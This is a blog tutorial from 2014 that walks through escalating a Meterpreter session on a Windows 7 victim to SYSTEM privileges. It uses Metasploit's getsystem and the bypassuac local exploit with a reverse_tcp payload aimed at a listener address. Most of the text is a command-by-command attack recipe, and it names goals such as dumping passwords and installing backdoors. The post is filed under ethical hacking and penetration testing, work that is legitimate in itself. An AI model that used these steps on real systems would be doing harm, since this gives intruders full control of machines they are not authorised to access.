Bypass UAC and get admin privilege in windows 7

using metasploit
Filed under: ETHICAL HACKING, KALI LINUX, PEN-TESTING — 9 Comments
June 19, 2014

Sometimes when you trying to exploit a security hole and success gain an access to the target
system, usually you only act as logged user and it’s not a local system account. In this tips and
trick there’s a simple step to escalate your privilege when you’re inside meterpreter.

This picture below taken when hacked successfully gain an access using Payload create by me.

#meterpreter > getuid

When running getuid command, we know that we running as user that already logged in to the
system but we didn’t act as system account. How do we do that to escalate our privilege to
system account?.

The session only has limited user rights. This can severely limit actions you can perform on the
remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different
techniques to attempt to gain SYSTEM level privileges on the remote system. There are also
various other (local) exploits that can be used to also escalate privileges.

#meterpreter > use priv

# #meterpreter > getsystem

make use of the ‘getsystem’ command, if its not already loaded we will need to first load the
‘priv’ extension.

We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any
options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails depending upon the operating system and exploiting
method we are using.
In this above image we are only getting access to normal system user acount with less
privileges, by executing post/windows/gather/win_privs command it will list the privilege of
the current users logged in.

For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo
command in your meterpeter shell you will get informations about your exploiting system.

#meterpreter > sysinfo

#meterpreter > run post/windows/gather/win_privs

If the getsystem code detects that it is running on a Windows 7 with UAC disabled and it is
running as local admin it will run getsystem and it will use the read registry method.

When we executing getsystem command it will fail because the current logged user have not
enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.
So we first try to bypass UAC enabled in windows 7, Luckily we have windows UAC bypass
exploit in metasploit.

Meterpreter on Kali no longer recognized “run bypassuac” instead we had to use

exploit/windows/local/bypassuac.
BypassUAC exploit that allows you to bypass Windows UAC in Windows Vista and Windows 7
both on x86 and x64 operating systems. This issue has still not been patched to-date and can
still be exploited on the most recent operating systems.

For that we need to background the session, and manually try bypassuac exploit and load the
session recently backgrounded and then exploit and execute getsystem to get admin privilege.

#meterpreter > background

#meterpreter > search uac

#meterpreter > use exploit/windows/local/bypassuac

I exploited this machine with the payload i created before, so try the method you used for
exploiting the machine before.

#meterpreter > set payload windows/meterpreter/reverse_tcp

#meterpreter > set LHOST 192.168.31.20

#meterpreter > set LPORT 8080

#meterpreter > set SESSION 1

#meterpreter > exploit

After getting acess try getsystem command.

#meterpreter > getsystem

https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-in-windows-
7-using-metasploit/